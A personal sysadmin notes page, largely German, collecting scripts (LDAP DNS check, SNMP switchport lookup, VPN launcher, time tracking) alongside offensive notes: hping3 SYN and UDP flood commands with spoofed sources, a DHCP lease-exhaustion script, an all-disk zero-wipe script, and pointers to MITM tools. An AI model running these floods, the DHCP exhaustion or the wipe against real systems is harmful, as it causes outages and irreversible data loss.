Need to have
wipe
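#!/bin/bash
# Zero-fill every block device that lsblk reports with TYPE "disk",
# TIMES_OVERWRITE passes each. Disks are wiped in parallel; the passes on one
# disk run one after the other. There is no undo — the countdown, during which
# the target list is printed, is the only chance to abort (Ctrl-C).
#
# Environment (optional):
#   GRACE_TIME       seconds to wait before the first write (default 10)
#   TIMES_OVERWRITE  number of zero-fill passes per disk (default 2)
GRACE_TIME="${GRACE_TIME:-10}"
TIMES_OVERWRITE="${TIMES_OVERWRITE:-2}"

# Both values feed arithmetic below; reject anything that is not a plain integer
# so an odd environment value cannot be evaluated as an expression.
[[ "$GRACE_TIME" =~ ^[0-9]+$ ]] || { echo "ERROR: GRACE_TIME must be an integer" >&2; exit 2; }
[[ "$TIMES_OVERWRITE" =~ ^[0-9]+$ ]] || { echo "ERROR: TIMES_OVERWRITE must be an integer" >&2; exit 2; }

# dd to a raw block device needs root; without it every pass would just fail.
if (( EUID != 0 )); then
  echo "ERROR: must run as root" >&2
  exit 2
fi

# Whole disks only (no partitions, no loop/rom devices), one device path per line.
mapfile -t HARDDISKS < <(lsblk -p -d -n -l -o NAME,TYPE | awk 'tolower($2) == "disk" {print $1}')
if (( ${#HARDDISKS[@]} == 0 )); then
  echo "ERROR: lsblk reported no disks, nothing to wipe" >&2
  exit 2
fi

echo "MACHINE: "
echo "--------------------"
dmidecode --type '1'
echo "--------------------"
echo "Disks that will be overwritten ${TIMES_OVERWRITE}x with zeros:"
printf '  %s\n' "${HARDDISKS[@]}"

# Countdown — the last chance to abort.
while (( GRACE_TIME > 0 )); do
  echo "Wiping starts in ${GRACE_TIME}s (Ctrl-C to abort)"
  sleep 1
  (( GRACE_TIME-- ))
done

pids=()
for CURRENT_HARDDISK in "${HARDDISKS[@]}"; do
  echo "Harddisk - $CURRENT_HARDDISK - Debug below"
  echo "-------------------------"
  # One background job per disk. Inside it the passes run sequentially:
  # several dd processes writing the same device at the same time do not add
  # up to several complete passes.
  (
    for (( pass = 1; pass <= TIMES_OVERWRITE; pass++ )); do
      echo "$CURRENT_HARDDISK: pass $pass/$TIMES_OVERWRITE"
      dd if=/dev/zero of="$CURRENT_HARDDISK" bs=16M 2>&1
    done
  ) &
  pids+=("$!")
  echo "-------------------------"
done

echo "Process Count Waiting: ${#pids[@]}"
for pid in "${pids[@]}"; do
  # dd ends a full pass with "No space left on device" and a non-zero status,
  # so the job status is not a success signal; the dd output above is.
  wait "$pid"
done
sync
echo "Done: ${#pids[@]} disk(s) processed"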
checkDNSEntriesLDAP
Active Directory auf seine Konsistenz überprüfen - forward lookup und reverse lookup der Einträge sollten übereinstimmen
Getestet auf: Ubuntu 18.04
Pakete erforderlich: php , php-ldap , php-mbstring
Achtung ich benutze hier bewusst die tls verschlüsselte Variante von ldap d.h. ldaps - die CA von der das Zertifikat für den AD Server unterschrieben wurde befindet sich unter /usr/share/ca-certificates/ und wurde mit dpkg-reconfigure ca-certificates ins System „integriert“ auch der Hostname stimmt mit dem Hostnamen aus den Zertifikatsinfos überein
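<?php
/*
 * Forward/reverse DNS consistency check for Active Directory computer objects.
 *
 * For each base DN in $dn every object matching $search is read; its
 * dNSHostName is resolved (gethostbyname) and the address is resolved back
 * (gethostbyaddr). The PTR name must equal the dNSHostName, compared
 * case-insensitively. One "FAIL ..." line is printed per problem, followed
 * by a summary. Exit status 2 when the LDAP bind fails.
 * Requires: php, php-ldap, php-mbstring.
 */
$server = "ldaps://AD_SERVER:636";
//domain user to connect to LDAP
$user = "STANDARD_USER_DOMAIN@DOMAIN_ACTIVE_DIRECTORY";
//user password: taken from the LDAP_BIND_PASSWORD environment variable when it
//is set, so the secret does not have to be stored in this file; the literal is
//only the placeholder fallback
$passwd = getenv("LDAP_BIND_PASSWORD") ?: "PASSWORD_STANDARD_USER_DOMAIN";
//zB: OU=EDV1,OU=Workstations,OU=Ressourcen,OU=VirtualSchool,DC=schule,DC=intern
$dn = array(0=>"DN_NAME_LDAP_PFAD1",1=>"DN_NAME_LDAP_PFAD2");
$search="(objectClass=computer)";
$errDNS=0;
$countAll=0;
$okDNS=0;
foreach ($dn as $baseDn)
{
    $ds=ldap_connect($server);
    // Active Directory expects LDAPv3 binds.
    ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
    if (!ldap_bind($ds, $user, $passwd))
    {
        fwrite(STDERR, "FAIL LDAP bind to ".$server." failed: ".ldap_error($ds)."\n");
        exit(2);
    }
    $sr=ldap_search($ds, $baseDn, $search, array(0=>"dNSHostName",1=>"distinguishedName"));
    if ($sr === false)
    {
        // A wrong or unreadable base DN should not abort the other OUs.
        fwrite(STDERR, "FAIL LDAP search below ".$baseDn." failed: ".ldap_error($ds)."\n");
        ldap_close($ds);
        continue;
    }
    $data = ldap_get_entries($ds, $sr);
    $countAll+=$data["count"];
    for ($i=0; $i<$data["count"]; $i++)
    {
        // ldap_get_entries() lowercases attribute names; the object's DN is
        // always available under the "dn" key.
        if(isset($data[$i]["dnshostname"][0]))
        {
            $hostname=$data[$i]["dnshostname"][0];
            // gethostbyname() hands the name back unchanged when no A record exists.
            $ip=gethostbyname($hostname);
            if($ip!=$hostname)
            {
                $reverseLookup=gethostbyaddr($ip);
                if($reverseLookup===false)
                {
                    $reverseLookup="";
                }
                if(mb_strtolower($reverseLookup) != mb_strtolower($hostname) )
                {
                    echo "FAIL Hostname: ".$hostname." IP: ".$ip." Reverse: ".$reverseLookup."\n";
                    $errDNS++;
                }
                else
                {
                    $okDNS++;
                }
            }
            else
            {
                echo "FAIL NO-IP Entry: ".$hostname."\n";
                $errDNS++;
            }
        }
        else
        {
            echo "FAIL NO DNSHostname: ".$data[$i]["dn"]."\n";
            $errDNS++;
        }
    }
    ldap_close($ds);
}
echo "Summary:\n";
echo "All Computer objects found: ".$countAll."\n";
echo "All Computer objects ok: ".$okDNS."\n";
echo "Consistency integrity: ";
// No objects found means nothing to rate — avoid the division by zero.
printf("%.2f \n", $countAll > 0 ? (($okDNS/$countAll)*100) : 0);
echo "Errors computer count: ".$errDNS."\n";
echo "OU's that i looked for :\n";
print_r($dn);
echo "\n";
?>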
mac-switchport
#!/bin/bash
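function bailout
{
  # Report an error and stop with status 2. The message goes to stderr so
  # stdout only ever carries the machine-readable SUCCESS;/ERROR; line.
  # $1 - error text; "\n" sequences in it are still expanded, as with echo -e
  printf 'ERROR: %b\n' "$1" >&2
  exit 2
}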
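function run_ips
{
  # Re-run this script once per switch address in SWITCHES_IPS (whitespace
  # separated, read from the environment) with the same MAC, then exit with
  # the sum of the individual exit codes — 0 only when every run succeeded.
  # $1 - MAC address to look up
  local switch_ip status exit_codes=0
  for switch_ip in $SWITCHES_IPS; do   # unquoted on purpose: split on whitespace
    "$0" "$switch_ip" "$1"
    status=$?
    exit_codes=$(( exit_codes + status ))
  done
  exit "$exit_codes"
}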
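function usage
{
  # Print both invocation forms on stderr and exit 1.
  # The quotes around the example IP list are part of the message (the original
  # double-quoted string dropped them).
  printf 'Usage: %s ip-address-switch mac-address e.g. 00:75:2d:ee:5e:11\n' "$0" >&2
  printf 'Usage: export SWITCHES_IPS="ip1 ip2 ip3" then %s mac-address e.g. 00:75:2d:ee:5e:11\n' "$0" >&2
  exit 1
}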
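# dot1dTpFdbPort: the bridge forwarding table, indexed by the six MAC octets,
# value = bridge port number.
OID_INTERFACE_AND_MAC="1.3.6.1.2.1.17.4.3.1.2"
# SNMPv1 community string; override through the environment instead of editing
# the file. It is passed on the snmpwalk command line and is therefore visible
# to other local users in the process list.
SNMP_COMMUNITY="${SNMP_COMMUNITY:-public}"
command -v snmpwalk > /dev/null || bailout "command snmpwalk not found! Debian/Ubuntu package: snmp"
[[ -n "$SWITCHES_IPS" ]] && [[ $# == 1 ]] && run_ips "$1"
[[ $# != 2 ]] && usage
ip="$1"
mac="$2"
# Six colon-separated hex octets, e.g. 00:1f:11:32:7f:1f
mac_re='^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$'
[[ "$mac" =~ $mac_re ]] || bailout "Not a correct MAC address format: $mac \n I need two digit hex mac address e.g. 00:1f:11:32:7f:1f"
mac_lower=${mac,,}
while IFS= read -r line; do
  # Lines look like "<oid-prefix>.0.117.45.238.94.17 = INTEGER: 3". The last six
  # OID components are the MAC octets in decimal, whichever way snmpwalk prints
  # the prefix (numeric or translated through a MIB), so only those are used.
  oid=${line%% = *}
  IFS=. read -r -a octets <<< "$oid"
  (( ${#octets[@]} >= 6 )) || continue
  mac_found=$(printf '%02x:' "${octets[@]: -6}")
  mac_found=${mac_found%:}
  if [[ "$mac_found" == "$mac_lower" ]]; then
    interface_found=${line##*: }
    interface_found=${interface_found//[[:space:]]/}
    # Number of MACs the table holds for that port (1 = a single end device,
    # more = another switch or AP hangs behind it).
    number_macs=$(snmpwalk -v 1 -Os -c "$SNMP_COMMUNITY" "$ip" "$OID_INTERFACE_AND_MAC" | grep -c "^.*INTEGER: $interface_found$")
    echo "SUCCESS;$ip;$mac;$interface_found;$number_macs"
    exit 0
  fi
done < <( snmpwalk -v 1 -Os -c "$SNMP_COMMUNITY" "$ip" "$OID_INTERFACE_AND_MAC" )
echo "ERROR;$ip;$mac;0;0"
exit 1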
Roadworker-Start OpenVPN
Ich möchte eine Roadworker OpenVPN Datei mit verschlüsseltem Private Key in der XFCE
GUI starten nach dem Login
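#!/bin/bash
# Ask for the private-key passphrase in a zenity dialog and start the
# "roadworker" OpenVPN profile as a daemon. Meant for an XFCE autostart entry
# after login; the outcome is reported in a second dialog.
CONFIG="/home/urnilxfgbez/openvpn/roadworker.conf"
PIDFILE="/tmp/roadworker.pid"

# mktemp creates the file mode 0600 already; chmod is kept as belt and braces.
temp_file=$(mktemp) || exit 1
chmod 600 "$temp_file"
# Remove the passphrase file on every exit path, not only the happy one.
trap 'rm -f -- "$temp_file"' EXIT

# A cancelled dialog (non-zero exit, empty file) would otherwise hand openvpn
# an empty passphrase.
if ! zenity --title "Roadworker VPN Password" --password > "$temp_file" || [[ ! -s "$temp_file" ]]; then
  zenity --error --text="Konnte VPN nicht erfolgreich starten - passwort?"
  exit 1
fi

openvpn --daemon --writepid "$PIDFILE" --config "$CONFIG" --askpass "$temp_file"
# openvpn has read the passphrase by the time it returns; drop it right away.
rm -f -- "$temp_file"

if pgrep --pidfile "$PIDFILE" > /dev/null; then
  zenity --info --text="Konnte VPN erfolgreich starten pid: /tmp/roadworker.pid"
else
  zenity --error --text="Konnte VPN nicht erfolgreich starten - passwort?"
fi
exit 0

# Variant when openvpn has to run as root via polkit; the passphrase file is
# still the user-owned temp file from above:
# pkexec --user root openvpn --daemon --writepid /tmp/roadworker.pid --config /home/urnilxfgbez/openvpn/roadworker.conf --askpass "$temp_file"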
Einfache Zeitaufzeichnung
Benötigt wird zenity / dateutils
KUNDE1 / KUNDE2 .. durch zB: Stammkunden ersetzen
Erstellt Einträge unter /PFAD/STUNDEN/KUNDENNAME_JAHRMONAT mit Datum/Von/Bis/Dauer/Tätigkeitsbeschreibung im CSV Format
Zeitaufzeichnung-Firma.sh
#!/bin/bash
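# Directory (with trailing slash) that receives the per-customer month files;
# can be overridden through the environment instead of editing the script.
PREFIX_TIME_RECORDING="${PREFIX_TIME_RECORDING:-/PFAD/STUNDEN/}"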
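function getTime() {
  # Ask for a time of day until the input looks like hh:mm; prints the value.
  # Only the shape is checked, not the range (e.g. 25:99 is accepted).
  # $1 - prompt label, e.g. "Beginnzeit"
  # Returns 1 when the dialog is cancelled instead of asking forever.
  local timePattern='^[0-9]{2}:[0-9]{2}$'
  local entered
  while :; do
    entered=$(zenity --entry --text="$1 im Format hh:mm") || return 1
    [[ "$entered" =~ $timePattern ]] && break
  done
  printf '%s\n' "$entered"
}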
function bailout() {
  # Show the message in an error dialog, then stop the script with status 1.
  # $1 - message text
  local msg=$1
  zenity --error --text="${msg}"
  exit 1
}
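function getCustomerName {
  # Offer the fixed (but editable) customer list until a non-empty name is
  # chosen; prints the name. Returns 1 when the dialog is cancelled.
  local customerName=""
  while [[ -z "$customerName" ]]; do
    customerName=$(zenity --list --editable --column="Kundenname" "KUNDE1" "KUNDE2" "KUNDE3") || return 1
  done
  printf '%s\n' "$customerName"
}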
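function getActivity {
  # Ask for the activity description until it is non-empty; prints it.
  # Returns 1 when the dialog is cancelled.
  local activityName=""
  while [[ -z "$activityName" ]]; do
    activityName=$(zenity --text="Tätigkeitbeschreibung" --entry) || return 1
  done
  printf '%s\n' "$activityName"
}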
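function getDate {
  # Ask for a date (today pre-filled) until it looks like dd.mm.yyyy; prints it.
  # Only the shape is checked, not calendar validity.
  # Returns 1 when the dialog is cancelled.
  local datePattern='^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$'
  local curDate entered
  curDate=$(date +%d.%m.%Y)
  while :; do
    entered=$(zenity --entry --entry-text="$curDate" --text="im Format dd.mm.yyyy") || return 1
    [[ "$entered" =~ $datePattern ]] && break
  done
  printf '%s\n' "$entered"
}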
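# Main flow: ask for the times, compute the duration, append one line to the
# customer's month file. The original "( zenity ...; exit 1 )" only left a
# subshell, so a missing dependency no longer stops the script — fixed below.
if ! command -v dateutils.ddiff > /dev/null; then
  zenity --error --text="dateutils.ddiff not found. Consider installing: sudo apt-get install dateutils"
  exit 1
fi
command -v bc > /dev/null || bailout "bc not found. Consider installing: sudo apt-get install bc"
beginTime=$(getTime "Beginnzeit") || bailout "Cancelled"
endTime=$(getTime "Endzeit") || bailout "Cancelled"
timeDiff=$(dateutils.ddiff "$beginTime" "$endTime" -f "%H:%M") || bailout "Cannot compute duration for $beginTime-$endTime"
hours=${timeDiff%%:*}
minutes=${timeDiff##*:}
# Decimal fraction of an hour, truncated to two places (15 -> .25, 10 -> .16).
minPercentage=$(printf '%s\n' "scale=2;$minutes/60" | bc -l)
[[ "$minPercentage" == "0" ]] && minPercentage=".00"
entryDate=$(getDate) || bailout "Cancelled"
customerName=$(getCustomerName) || bailout "Cancelled"
activityName=$(getActivity) || bailout "Cancelled"
# The customer name becomes part of the file path below; a "/" in it would
# point outside PREFIX_TIME_RECORDING.
[[ "$customerName" == */* ]] && bailout "Customer name must not contain '/': $customerName"
# entryDate is dd.mm.yyyy (validated by getDate); day is not needed.
IFS=. read -r day month year <<< "$entryDate"
CURRENT_MONTH="$PREFIX_TIME_RECORDING$customerName-$year$month.txt"
printf '%s\n' "$CURRENT_MONTH"
[[ -e "$CURRENT_MONTH" ]] || touch "$CURRENT_MONTH"
[[ -w "$CURRENT_MONTH" ]] || bailout "Cannot write to: $CURRENT_MONTH"
# NOTE: fields are ';'-separated; a ';' inside the activity text shifts the
# columns of that line.
entryText="$entryDate;$beginTime-$endTime;$hours${minPercentage}h;$activityName"
printf '%s\n' "$entryText" >> "$CURRENT_MONTH" || bailout "Cannot write to: $CURRENT_MONTH CHECK MANUALLY !!!!"
zenity --info --text="SUCCESS: $CURRENT_MONTH : $entryText"
exit 0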
dsniff suite
Dsniff suite:
http://monkey.org/~dugsong/dsniff/
Keywords: layer 2 attacks, arp spoofing, sniffing , man-in-the-middle attack, arpspoof, dsniff
hping3
In summary, the aim of SYN flood is sending lots of SYN packets to the
server and ignoring SYN+ACK packets returned by the server. This causes
the server to use its resources for a configured amount of time for
the possibility of the expected ACK packets arriving.
If an attacker sends enough SYN packets, this will overwhelm the server
because servers are limited in the number of concurrent TCP connections.
If the server reaches its limit, it cannot establish new TCP connections
until the existing connections which are in the SYN-RCVD state timeout.
SYN flood attacks can be performed with hping3.
Simple SYN flood:
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
using eth0, addr: xxx.xxx.xxx.xxx, MTU: 1500
HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 0 data
bytes
hping in flood mode, no replies will be shown
Advanced SYN flood with random source IP, different data size, and
window size:
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood
--rand-source TARGET_SITE
HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 120
data bytes
hping in flood mode, no replies will be shown
--flood: send packets as fast as possible
--rand-source: random source address
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport: destination port (default 0)
For detailed information see the manual.
UDP Flood
UDP is a protocol which does not need to create a session between two
devices. In other words, no handshake process required.
A UDP flood does not exploit any vulnerability. The aim of UDP floods is
simply creating and sending large amount of UDP datagrams from spoofed
IPs to the target server. When a server receives this type of traffic,
it is unable to process every request and it consumes its bandwidth with
sending ICMP “destination unreachable” packets.
hping3 can be used for creating UDP floods:
root@kali:~# hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): udp mode set, 28
headers + 0 data bytes
hping in flood mode, no replies will be shown
--flood: send packets as fast as possible
--rand-source: random source address
--udp: UDP mode
-p --destport: destination port (default 0)
For detailed information see the manual.
hping3 --count 2 --syn --destport 22 --tcp-timestamp 10.0.23.245
HPING 10.0.23.245 (eth0 10.0.23.245): S set, 40 headers + 0 data bytes
len=56 ip=10.0.23.245 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=65160 rtt=7.6 ms
TCP timestamp: tcpts=1138723235
len=56 ip=10.0.23.245 ttl=64 DF id=0 sport=22 flags=SA seq=1 win=65160 rtt=3.5 ms
TCP timestamp: tcpts=1138724235
HZ seems hz=1000
System uptime seems: 13 days, 4 hours, 18 minutes, 44 seconds
--- 10.0.23.245 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 3.5/5.6/7.6 ms
consumeDHCP
#!/bin/bash
NIC_INTERFACE=$1        # physical NIC the macvlan interfaces are stacked on
NUMBER=$2               # how many DHCP leases to request
BRIDGE_NAME="br-dhcp"   # not referenced anywhere below
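function bailout
{
  # Print the error plus both usage lines on stderr and exit 2.
  # $1 - error text ("\n" escapes are expanded, as with echo -e)
  printf '%b\n' "$1" >&2
  printf 'Usage: %s nic Number_of_Ips\n' "$0" >&2
  printf 'Usage: %s clean\n' "$0" >&2
  exit 2
}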
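function clean
{
  # Tear down every tap-foo-hoo-N interface left by an earlier run: release
  # its lease, bring it down, delete it, then kill any dhclient still attached.
  # Stops at the first N whose interface does not exist, so the numbering must
  # be contiguous (the creation loop guarantees that).
  local prefix="tap-foo-hoo"
  local count=1
  local dev
  while ip addr ls "$prefix-$count" &>/dev/null; do
    dev="$prefix-$count"
    echo "releasing: $dev ..."
    dhclient -r --no-pid -d -lf "/var/lib/dhcp/dhclient-$dev.lease" "$dev"
    ip li set dev "$dev" down
    ip li del "$dev"
    (( count++ ))
  done
  # dhclient processes started for our interfaces (matched on their command
  # line) that outlived the release; "nothing to kill" is not an error here.
  pkill -9 -f "dhclient.*$prefix" &>/dev/null || true
}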
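command -v macchanger > /dev/null || bailout "Cannot find macchanger : apt-get install macchanger"
command -v ip > /dev/null || bailout "Cannot find ip to create tap interface: apt-get install iproute2"
command -v dhclient > /dev/null || bailout "Cannot find dhclient: apt-get install isc-dhcp-client"
[[ $# != 2 && $# != 1 ]] && bailout "Parameters missing.."
if [[ "$1" == "clean" ]]; then
  clean
  exit 0
fi
# Validate before any arithmetic: (( NUMBER > 0 )) on an arbitrary string would
# evaluate it as an expression (variable names, array subscripts with command
# substitution), which a count argument must never trigger.
[[ "$NUMBER" =~ ^[0-9]+$ ]] || bailout "Number needs to be a positive integer"
(( NUMBER > 0 )) || bailout "Number needs to be more than 0"
(( EUID == 0 )) || bailout "Creating interfaces and running dhclient needs root"
ip addr ls "$NIC_INTERFACE" &> /dev/null || bailout "Cannot find interface: $NIC_INTERFACE"
clean
ip li set dev "$NIC_INTERFACE" up
for (( i = 1; i <= NUMBER; i++ )); do
  tap_name="tap-foo-hoo-$i"
  ip li add link "$NIC_INTERFACE" "$tap_name" type macvlan || { echo "WARN: cannot create $tap_name" >&2; continue; }
  ip li set dev "$tap_name" down
  # Random MAC so every macvlan looks like a separate client to the DHCP server.
  macchanger -r "$tap_name" > /dev/null
  ip li set dev "$tap_name" up
  # Left running in the background on purpose; "clean" reaps them.
  dhclient --no-pid -lf "/var/lib/dhcp/dhclient-$tap_name.lease" "$tap_name" &
done
exit 0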
yersinia
http://www.yersinia.net/
keywords: Dos , DHCP flooding , vlan attack
sslstrip
http://www.thoughtcrime.org/software/sslstrip/
Keywords: man-in-the-middle
reptyr
man Auszug
"reptyr is a utility for taking an existing running program and attaching it to a new terminal"
apt-get install reptyr
reptyr PID
crunch
usage: crunch <min-len> <max-len> [charset] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
or
usage: crunch <min-len> <max-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
min-len is the minimum length string you want crunch to start at
max-len is the maximum length string you want crunch to end at
[charset] is optional. You may specify a character set for crunch to use on the command line or if you leave it blank crunch will use abcdefghijklmnopqrstuvwxyz as the character set. NOTE: If you want to include the space character in your character set you must enclose your character set in quotes i.e. "abc "
[-f <path to charset.lst> <charset-name>] is the alternative to setting the character set on command line. This parameter allows you to specify a character set from the charset.lst.
NOTE: You may either not specify a charset, you may specify a character set on the command line, or you may specify -f <path to charset.lst> <charset-name>. You can only do one.
[-t [FIXED]@@@@] is optional and allows you to specify a pattern, eg: @@god@@@@ where the only the @'s will change
[-s startblock] is optional and allows you to specify the starting string, eg: 03god22fs
[-o wordlist.txt] is optional allows you to specify the file to write the output to, eg: wordlist.txt
[-c number] is optional and specifies the number of lines to write to output file, only works if -o START is used, eg: 60 The output files will be in the format of starting letter-ending letter for example:
./crunch 1 1 -f /pentest/password/crunch/charset.lst
mixalpha-numeric-all-space -o START -c 60
will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is the ending character is space and ls has to escape it to print it. Yes you will need to put in the \ when specifying the filename.
examples:
./crunch 1 8
crunch will display a wordlist that starts at a and ends at zzzzzzzz
./crunch 1 6 abcdefg
crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
./crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
crunch will use the mixalpha-numeric-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start with a and end with " "
./crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa
crunch will generate an 8 character wordlist using the mixalpha-numeric-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start at cbdogaaa and end at " dog "
keywords: wordlist-generator, wordlist, gen-wordlist, wordlists
hddtemp
hddtemp /dev/sdx
keywords: harddisk, hddtemp, temperature
soundconverter
soundconverter - GNOME application to convert audio files into other formats
apt-get install soundconverter
keywords: mp4 convert, convert audio , CONVERT, MP3, mp3 MP4, youtube-videos
transmageddon
apt-get install transmageddon
keywords: video converter, VideoConverter, converter , Video
iso erstellen
mkisofs -V Test -r Altaro_Backup/ > altaro_cd.iso
genisoimage -o c23x_intel_raid.iso C23x_INTEL_RAID/
keywords: iso, ISO, iso-erstellen, mkisofs, ISO-mount